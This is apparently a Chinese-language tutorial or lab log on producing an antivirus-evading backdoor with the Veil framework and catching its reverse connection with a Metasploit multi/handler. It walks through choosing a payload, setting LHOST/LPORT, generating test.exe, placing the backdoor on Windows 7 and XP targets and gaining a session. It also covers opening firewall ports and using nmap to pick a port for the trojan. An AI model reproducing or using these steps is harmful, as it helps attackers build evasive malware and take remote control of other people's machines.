目录
1.1、启动:
打开终端,并输入veil进入交互界面
1.2、分类
veil有两个免杀的⼯具:Evasion和Ordnance
Evasion⽤来对⽂件进行免杀处理
Ordnance可⽣成在Veil-Evasion中使⽤的shellcode
use Evasion #选择Evasion功能
list #查看payload列
大多选用go和ruby语言编码的
use 7
Required Options:需要都填上(这里LHOST为空,要补上,其余的可以修改)
Required Options: Name Value Description ---- ----- ----------- COMPILE_TO_EXE Y Compile to an executable LHOST IP of the Metasploit handler LPORT 4444 Port of the Metasploit handler输入 generate 执行payload
然后输入产生的文件名
/var/lib/veil/output/compiled/test.exe
Executable(可执行)
Source code(源代码)
Metasploit Resource(Metasploit资源)
1.3、利用msf测试
启动:
sudo msfconsole -r /var/lib/veil/output/handlers/test.rc
利用模块:
use exploit/multi/handler
show options
set lhost 192.168.190.149
exploit
(然后开始监听了)
1.4、免杀payload被运行
win7
现在将后门放到目标机中(这里是win7)
然后运行它
winxp
我现在试一下winxp
1.5、结果
winxp测试的2次,就是那个后门在winxp上运行时候报错
然后监听失败
win7测试的2次
在win7上运行没有保错
最后出现了会话控制
1.6、无法监听错误改正
错误过程一:
无法监听到后门端口
随机设置的端口没有开放
lsof -i:端口号 没查到端口信息
systemctl start firewalld firewall-cmd --zone=public --add-port=1935/tcp --permanent --zone #作用域 --add-port=1935/tcp #添加端口,格式为:端口/通讯协议 --permanent #永久生效,没有此参数重启后失效 firewall-cmd --reload //重启防火墙
netstat -ntlp //查看当前所有tcp端口· netstat -ntulp |grep 1935 //查看所有1935端口使用情况
错误过程二:
最后我认为是
先用nmap扫描目标开放的tcp端口,然后再生成相应端口的木马
使自己,和目标开放端口都一样
最后错误原因
是我启动的时候
直接是sudo msfconsole
正确做法:
通过以下方法启动msfconsole
sudo msfconsole -r /var/lib/veil/output/handlers/test.rc